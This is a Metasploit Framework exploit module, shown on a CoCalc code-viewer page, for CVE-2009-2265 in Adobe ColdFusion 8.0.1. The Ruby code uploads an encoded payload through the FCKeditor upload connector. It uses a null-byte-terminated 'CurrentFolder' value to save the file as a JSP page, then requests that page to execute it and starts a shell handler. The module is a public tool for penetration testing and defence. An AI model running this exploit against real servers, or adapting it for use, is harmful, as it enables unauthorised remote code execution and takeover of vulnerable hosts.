Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/coldfusion_fckeditor.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpClient
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'ColdFusion 8.0.1 Arbitrary File Upload and Execute',
16
'Description' => %q{
17
This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload
18
and Execute vulnerability.
19
},
20
'Author' => [ 'MC' ],
21
'License' => MSF_LICENSE,
22
'Platform' => 'win',
23
'Privileged' => true,
24
'References' => [
25
[ 'CVE', '2009-2265' ],
26
[ 'OSVDB', '55684'],
27
],
28
'Targets' => [
29
[
30
'Universal Windows Target',
31
{
32
'Arch' => ARCH_JAVA,
33
'Payload' =>
34
{
35
'DisableNops' => true,
36
},
37
}
38
],
39
],
40
'DefaultOptions' => {
41
'SHELL' => 'cmd.exe'
42
},
43
'DefaultTarget' => 0,
44
'DisclosureDate' => '2009-07-03',
45
'Notes' => {
46
'Reliability' => UNKNOWN_RELIABILITY,
47
'Stability' => UNKNOWN_STABILITY,
48
'SideEffects' => UNKNOWN_SIDE_EFFECTS
49
}
50
)
51
)
52
53
register_options(
54
[
55
OptString.new('FCKEDITOR_DIR', [ false, 'The path to upload.cfm ', '/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm' ]),
56
]
57
)
58
end
59
60
def exploit
61
page = rand_text_alpha_upper(rand(10) + 1) + ".jsp"
62
63
dbl = Rex::MIME::Message.new
64
dbl.add_part(payload.encoded, "application/x-java-archive", nil, "form-data; name=\"newfile\"; filename=\"#{rand_text_alpha_upper(8)}.txt\"")
65
file = dbl.to_s
66
file.strip!
67
68
print_status("Sending our POST request...")
69
70
res = send_request_cgi(
71
{
72
'uri' => normalize_uri(datastore['FCKEDITOR_DIR']),
73
'query' => "Command=FileUpload&Type=File&CurrentFolder=/#{page}%00",
74
'version' => '1.1',
75
'method' => 'POST',
76
'ctype' => 'multipart/form-data; boundary=' + dbl.bound,
77
'data' => file,
78
}, 5
79
)
80
81
if (res and res.code == 200 and res.body =~ /OnUploadCompleted/)
82
print_status("Upload succeeded! Executing payload...")
83
84
send_request_raw(
85
{
86
# default path in Adobe ColdFusion 8.0.1.
87
'uri' => '/userfiles/file/' + page,
88
'method' => 'GET',
89
}, 5
90
)
91
92
handler
93
else
94
print_error("Upload Failed...")
95
return
96
end
97
end
98
end
99
100